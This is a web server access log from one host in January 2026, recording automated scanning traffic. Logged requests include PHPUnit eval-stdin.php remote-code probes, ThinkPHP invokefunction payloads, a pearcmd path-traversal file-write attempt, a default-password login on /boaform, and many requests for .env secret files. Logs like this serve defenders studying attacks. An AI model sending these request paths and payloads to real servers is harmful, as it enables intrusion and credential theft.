"/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 23.224.68.178] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:07:14:00 +0000] 404 - GET http 91.82.83.208 "/phpunit/src/Util/PHP/eval-stdin.php" [Client 23.224.68.178] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:07:14:00 +0000] 404 - GET http 91.82.83.208 "/phpunit/Util/PHP/eval-stdin.php" [Client 23.224.68.178] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:07:14:00 +0000] 404 - GET http 91.82.83.208 "/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 23.224.68.178] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:07:14:01 +0000] 404 - GET http 91.82.83.208 "/lib/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 23.224.68.178] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:07:14:01 +0000] 404 - GET http 91.82.83.208 "/lib/phpunit/src/Util/PHP/eval-stdin.php" [Client 23.224.68.178] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:07:14:01 +0000] 404 - GET http 91.82.83.208 "/lib/phpunit/Util/PHP/eval-stdin.php" [Client 23.224.68.178] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:07:14:02 +0000] 404 - GET http 91.82.83.208 "/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 23.224.68.178] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:07:14:02 +0000] 404 - GET http 91.82.83.208 "/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 23.224.68.178] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:07:14:02 +0000] 404 - GET http 91.82.83.208 "/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 23.224.68.178] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:07:14:02 +0000] 404 - GET http 91.82.83.208 "/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 23.224.68.178] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:07:14:02 +0000] 404 - GET http 91.82.83.208 "/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 23.224.68.178] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:07:14:03 +0000] 404 - GET http 91.82.83.208 "/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 23.224.68.178] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:07:14:03 +0000] 404 - GET http 91.82.83.208 "/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 23.224.68.178] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:07:14:03 +0000] 404 - GET http 91.82.83.208 "/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 23.224.68.178] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:07:14:03 +0000] 404 - GET http 91.82.83.208 "/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 23.224.68.178] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:07:14:04 +0000] 404 - GET http 91.82.83.208 "/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 23.224.68.178] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:07:14:04 +0000] 404 - GET http 91.82.83.208 "/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 23.224.68.178] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:07:14:04 +0000] 404 - GET http 91.82.83.208 "/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 23.224.68.178] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:07:14:04 +0000] 404 - GET http 91.82.83.208 "/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 23.224.68.178] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:07:14:05 +0000] 404 - GET http 91.82.83.208 "/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 23.224.68.178] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:07:14:05 +0000] 404 - GET http 91.82.83.208 "/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 23.224.68.178] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:07:14:05 +0000] 404 - GET http 91.82.83.208 "/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 23.224.68.178] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:07:14:05 +0000] 404 - GET http 91.82.83.208 "/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 23.224.68.178] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:07:14:05 +0000] 404 - GET http 91.82.83.208 "/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 23.224.68.178] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:07:14:06 +0000] 404 - GET http 91.82.83.208 "/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 23.224.68.178] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:07:14:06 +0000] 404 - GET http 91.82.83.208 "/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 23.224.68.178] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:07:14:06 +0000] 404 - GET http 91.82.83.208 "/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 23.224.68.178] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:07:14:06 +0000] 404 - GET http 91.82.83.208 "/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 23.224.68.178] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:07:14:07 +0000] 404 - GET http 91.82.83.208 "/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 23.224.68.178] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:07:14:07 +0000] 404 - GET http 91.82.83.208 "/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello" [Client 23.224.68.178] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:07:14:07 +0000] 404 - GET http 91.82.83.208 "/public/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello" [Client 23.224.68.178] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:07:14:07 +0000] 403 - GET http 91.82.83.208 "/index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/+/tmp/index1.php" [Client 23.224.68.178] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:07:14:08 +0000] 403 - GET http 91.82.83.208 "/index.php?lang=../../../../../../../../tmp/index1" [Client 23.224.68.178] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:07:14:08 +0000] 404 - GET http 91.82.83.208 "/containers/json" [Client 23.224.68.178] [Length 150] [Gzip -] "libredtail-http" "-" +[18/Jan/2026:07:14:25 +0000] 404 - GET http 91.82.83.208 "/SDK/webLanguage" [Client 204.76.203.6] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Jan/2026:07:25:50 +0000] 200 - GET http 91.82.83.208 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Jan/2026:07:28:07 +0000] 404 - GET http localhost-nginx-proxy-manager "/boaform/admin/formLogin?username=adminisp&psd=adminisp" [Client 219.157.65.142] [Length 150] [Gzip -] "-" "-" +[18/Jan/2026:07:34:20 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Jan/2026:07:38:04 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Jan/2026:07:48:44 +0000] 200 - GET http 91.82.83.208 "/" [Client 176.65.149.159] [Length 1033] [Gzip -] "-" "-" +[18/Jan/2026:07:52:16 +0000] 400 - GET http 91.82.83.208 "/" [Client 3.134.148.59] [Length 654] [Gzip -] "cypex.ai/scanning Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36" "-" +[18/Jan/2026:07:54:24 +0000] 400 - GET http 91.82.83.208 "/" [Client 3.134.148.59] [Length 654] [Gzip -] "cypex.ai/scanning Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36" "-" +[18/Jan/2026:07:58:15 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Jan/2026:07:58:18 +0000] 400 - - http localhost "-" [Client 3.134.148.59] [Length 154] [Gzip -] "-" "-" +[18/Jan/2026:08:02:15 +0000] 400 - GET http 91.82.83.208 "/" [Client 185.12.59.118] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0" "-" +[18/Jan/2026:08:05:50 +0000] 200 - GET http 91.82.83.208 "/" [Client 149.50.103.48] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Jan/2026:08:11:17 +0000] 404 - GET http 91.82.83.208 "/.env" [Client 78.153.140.177] [Length 150] [Gzip -] "Mozilla/5.0 (Windows; U; Windows NT 6.1; nl; rv:1.9.2.10) Gecko/20100914 Firefox/3.6.10 ( .NET CLR 3.5.30729)" "-" +[18/Jan/2026:08:11:17 +0000] 404 - GET http 91.82.83.208 "/api/.env" [Client 78.153.140.177] [Length 150] [Gzip -] "Mozilla/5.0(Windows; U; Windows NT 5.2; rv:1.9.2) Gecko/20100101 Firefox/3.6" "-" +[18/Jan/2026:08:11:17 +0000] 404 - GET http 91.82.83.208 "/backend/.env" [Client 78.153.140.177] [Length 552] [Gzip -] "Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/540.0 (KHTML, like Gecko) Ubuntu/10.10 Chrome/9.1.0.0 Safari/540.0" "-" +[18/Jan/2026:08:11:19 +0000] 404 - GET http 91.82.83.208 "/admin/.env" [Client 78.153.140.177] [Length 552] [Gzip -] "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)" "-" +[18/Jan/2026:08:11:19 +0000] 404 - GET http 91.82.83.208 "/.env.example" [Client 78.153.140.177] [Length 150] [Gzip -] "Mozilla/5.0 (X11; U; Linux i686; ja-JP; rv:1.8.1.11) Gecko/20071204 Ubuntu/7.10 (gutsy) Firefox/2.0.0.11" "-" +[18/Jan/2026:08:11:20 +0000] 404 - GET http 91.82.83.208 "/app_dev.php/_profiler/phpinfo" [Client 78.153.140.177] [Length 552] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.96 Safari/537.36" "-" +[18/Jan/2026:08:11:20 +0000] 200 - GET http 91.82.83.208 "/?phpinfo=-1" [Client 78.153.140.177] [Length 1033] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0" "-" +[18/Jan/2026:08:11:20 +0000] 404 - GET http 91.82.83.208 "/docker.env" [Client 78.153.140.177] [Length 150] [Gzip -] "Opera/9.80 (X11; Linux x86_64) Presto/2.12.388 Version/12.16" "-" +[18/Jan/2026:08:11:20 +0000] 404 - GET http 91.82.83.208 "/icon/.env" [Client 78.153.140.177] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0" "-" +[18/Jan/2026:08:11:20 +0000] 404 - GET http 91.82.83.208 "/local/.env" [Client 78.153.140.177] [Length 150] [Gzip -] "mozilla/5.0 (iphone; cpu iphone os 7_0_2 like mac os x) applewebkit/537.51.1 (khtml, like gecko) version/7.0 mobile/11a501 safari/9537.53" "-" +[18/Jan/2026:08:11:20 +0000] 404 - GET http 91.82.83.208 "/.docker/laravel/app/.env" [Client 78.153.140.177] [Length 150] [Gzip -] "Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; en) Presto/2.10.289 Version/12.00" "-" +[18/Jan/2026:08:11:20 +0000] 404 - GET http 91.82.83.208 "/login/.env" [Client 78.153.140.177] [Length 552] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 1083) AppleWebKit/537.36 (KHTML like Gecko) Chrome/28.0.1469.0 Safari/537.36" "-" +[18/Jan/2026:08:11:20 +0000] 404 - GET http 91.82.83.208 "/engine/.env" [Client 78.153.140.177] [Length 552] [Gzip -] "Mozilla/5.0 (Linux; Android 7.0; SM-J727T1 Build/NRD90M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.111 Mobile Safari/537.36" "-" +[18/Jan/2026:08:11:20 +0000] 404 - GET http 91.82.83.208 "/.env_old" [Client 78.153.140.177] [Length 552] [Gzip -] "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/528.8 (KHTML, like Gecko) Chrome/2.0.156.0 Safari/528.8" "-" +[18/Jan/2026:08:11:21 +0000] 404 - GET http 91.82.83.208 "/export/.env" [Client 78.153.140.177] [Length 150] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/602.1.37 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.4" "-" +[18/Jan/2026:08:11:21 +0000] 404 - GET http 91.82.83.208 "/.env.staging" [Client 78.153.140.177] [Length 150] [Gzip -] "Mozilla/5.0 (Macintosh; PPC Mac OS X 10_5_8) AppleWebKit/534.50.2 (KHTML, like Gecko) Version/5.0.6 Safari/533.22.3" "-" +[18/Jan/2026:08:11:21 +0000] 404 - GET http 91.82.83.208 "/v3/.env" [Client 78.153.140.177] [Length 150] [Gzip -] "Mozilla/5.0 (Macintosh; U; PPC Mac OS; en-en) AppleWebKit/412 (KHTML, like Gecko) Safari/412" "-" +[18/Jan/2026:08:11:21 +0000] 404 - GET http 91.82.83.208 "/libs/.env" [Client 78.153.140.177] [Length 150] [Gzip -] "Opera/6.05 (Windows 2000; U) [oc]" "-" +[18/Jan/2026:08:11:21 +0000] 404 - GET http 91.82.83.208 "/linux/.env" [Client 78.153.140.177] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; yie11; rv:11.0) like Gecko" "-" +[18/Jan/2026:08:11:21 +0000] 404 - GET http 91.82.83.208 "/.env.docker" [Client 78.153.140.177] [Length 552] [Gzip -] "Mozilla/4.0 (compatible; MSIE 5.01; Windows 95; MSIECrawler)" "-" +[18/Jan/2026:08:11:21 +0000] 404 - GET http 91.82.83.208 "/api/v2/.env" [Client 78.153.140.177] [Length 552] [Gzip -] "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1)" "-" +[18/Jan/2026:08:11:21 +0000] 404 - GET http 91.82.83.208 "/.env.prod.local" [Client 78.153.140.177] [Length 150] [Gzip -] "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.2) Gecko/2008092809 Gentoo Firefox/3.0.2" "-" +[18/Jan/2026:08:11:22 +0000] 404 - GET http 91.82.83.208 "/site/.env" [Client 78.153.140.177] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 OPR/26.0.1656.60" "-" +[18/Jan/2026:08:11:22 +0000] 404 - GET http 91.82.83.208 "/dependencies/.env" [Client 78.153.140.177] [Length 150] [Gzip -] "Opera/8.51 (Windows NT 5.0; U; en)" "-" +[18/Jan/2026:08:11:22 +0000] 404 - GET http 91.82.83.208 "/sandbox/.env" [Client 78.153.140.177] [Length 552] [Gzip -] "Mozilla/5.0 (Linux; Android 7.1.2; Redmi 4X Build/N2G47H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.111 Mobile Safari/537.36" "-" +[18/Jan/2026:08:11:22 +0000] 404 - GET http 91.82.83.208 "/contact/.env" [Client 78.153.140.177] [Length 552] [Gzip -] "Mozilla/4.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/5.0)" "-" +[18/Jan/2026:08:11:22 +0000] 404 - GET http 91.82.83.208 "/build/.env" [Client 78.153.140.177] [Length 150] [Gzip -] "Mozilla/5.0 (iPhone; CPU iPhone OS 11_2_2 like Mac OS X) AppleWebKit/604.4.7 (KHTML, like Gecko) Version/11.0 EdgiOS/41.8.0.0 Mobile/15C202 Safari/604.4.7" "-" +[18/Jan/2026:08:11:22 +0000] 404 - GET http 91.82.83.208 "/bot/.env" [Client 78.153.140.177] [Length 150] [Gzip -] "Opera/9.80 (X11; Linux x86_64; U; bg) Presto/2.8.131 Version/11.10" "-" +[18/Jan/2026:08:11:22 +0000] 404 - GET http 91.82.83.208 "/office/.env" [Client 78.153.140.177] [Length 150] [Gzip -] "Mozilla/5.0 (Android 4.4.4; Mobile; rv:43.0) Gecko/43.0 Firefox/43.0" "-" +[18/Jan/2026:08:11:22 +0000] 404 - GET http 91.82.83.208 "/repo/.env" [Client 78.153.140.177] [Length 552] [Gzip -] "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; NP02)" "-" +[18/Jan/2026:08:16:07 +0000] 200 - GET http 91.82.83.208 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Jan/2026:08:20:44 +0000] 200 - GET http 91.82.83.208 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Jan/2026:08:22:15 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Jan/2026:08:24:17 +0000] 400 - GET http 91.82.83.208 "/" [Client 3.143.33.63] [Length 654] [Gzip -] "cypex.ai/scanning Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36" "-" +[18/Jan/2026:08:24:19 +0000] 400 - GET http 91.82.83.208 "/" [Client 3.143.33.63] [Length 654] [Gzip -] "cypex.ai/scanning Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36" "-" +[18/Jan/2026:08:25:37 +0000] 400 - - http localhost "-" [Client 3.143.33.63] [Length 154] [Gzip -] "-" "-" +[18/Jan/2026:08:27:38 +0000] 404 - GET http 91.82.83.208 "/.env" [Client 45.156.87.161] [Length 122] [Gzip 1.35] "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-" +[18/Jan/2026:08:31:43 +0000] 400 - - http localhost "-" [Client 3.143.33.63] [Length 0] [Gzip -] "-" "-" +[18/Jan/2026:08:36:09 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Jan/2026:08:46:47 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Jan/2026:09:00:24 +0000] 200 - GET http 91.82.83.208 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Jan/2026:09:10:28 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Jan/2026:09:17:59 +0000] 200 - GET http 91.82.83.208 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Jan/2026:09:29:17 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Jan/2026:09:36:06 +0000] 200 - GET http 91.82.83.208 "/" [Client 149.50.103.48] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Jan/2026:09:39:01 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Jan/2026:09:57:24 +0000] 200 - GET http 91.82.83.208 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Jan/2026:09:58:20 +0000] 200 - GET http 91.82.83.208 "/" [Client 95.214.55.246] [Length 1033] [Gzip -] "python-requests/2.31.0" "-" +[18/Jan/2026:10:00:38 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Jan/2026:10:06:47 +0000] 200 - GET http 91.82.83.208 "/" [Client 43.153.27.244] [Length 568] [Gzip 1.86] "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1" "-" +[18/Jan/2026:10:14:25 +0000] 200 - GET http 91.82.83.208 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Jan/2026:10:20:41 +0000] 405 - POST http 91.82.83.208 "/" [Client 193.142.147.209] [Length 154] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[18/Jan/2026:10:25:30 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Jan/2026:10:27:24 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Jan/2026:10:45:14 +0000] 200 - GET http 91.82.83.208 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Jan/2026:10:52:46 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Jan/2026:10:57:17 +0000] 404 - GET http 91.82.83.208 "/SDK/webLanguage" [Client 23.94.162.106] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Jan/2026:11:01:55 +0000] 200 - GET http 91.82.83.208 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Jan/2026:11:06:51 +0000] 404 - GET http 91.82.83.208 "/SDK/webLanguage" [Client 89.42.231.200] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Jan/2026:11:07:15 +0000] 200 - GET http 91.82.83.208 "/" [Client 149.50.103.48] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Jan/2026:11:10:43 +0000] 404 - GET http 91.82.83.208 "/SDK/webLanguage" [Client 5.183.209.196] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Jan/2026:11:14:59 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Jan/2026:11:17:13 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Jan/2026:11:19:55 +0000] 200 - GET http 91.82.83.208 "/" [Client 87.121.84.38] [Length 1033] [Gzip -] "-" "-" +[18/Jan/2026:11:21:57 +0000] 404 - GET http 91.82.83.208 "/.env" [Client 45.119.212.42] [Length 150] [Gzip -] "Mozilla/5.0" "-" +[18/Jan/2026:11:21:58 +0000] 404 - GET http 91.82.83.208 "/env" [Client 45.119.212.42] [Length 150] [Gzip -] "Mozilla/5.0" "-" +[18/Jan/2026:11:21:59 +0000] 404 - GET http 91.82.83.208 "/public/.env" [Client 45.119.212.42] [Length 150] [Gzip -] "Mozilla/5.0" "-" +[18/Jan/2026:11:22:00 +0000] 404 - GET http 91.82.83.208 "/public/env" [Client 45.119.212.42] [Length 150] [Gzip -] "Mozilla/5.0" "-" +[18/Jan/2026:11:22:01 +0000] 404 - GET http 91.82.83.208 "/app/.env" [Client 45.119.212.42] [Length 150] [Gzip -] "Mozilla/5.0" "-" +[18/Jan/2026:11:32:52 +0000] 200 - GET http 91.82.83.208 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Jan/2026:11:38:01 +0000] 404 - GET http 91.82.83.208 "/SDK/webLanguage" [Client 23.94.162.106] [Length 183] [Gzip 3.21] 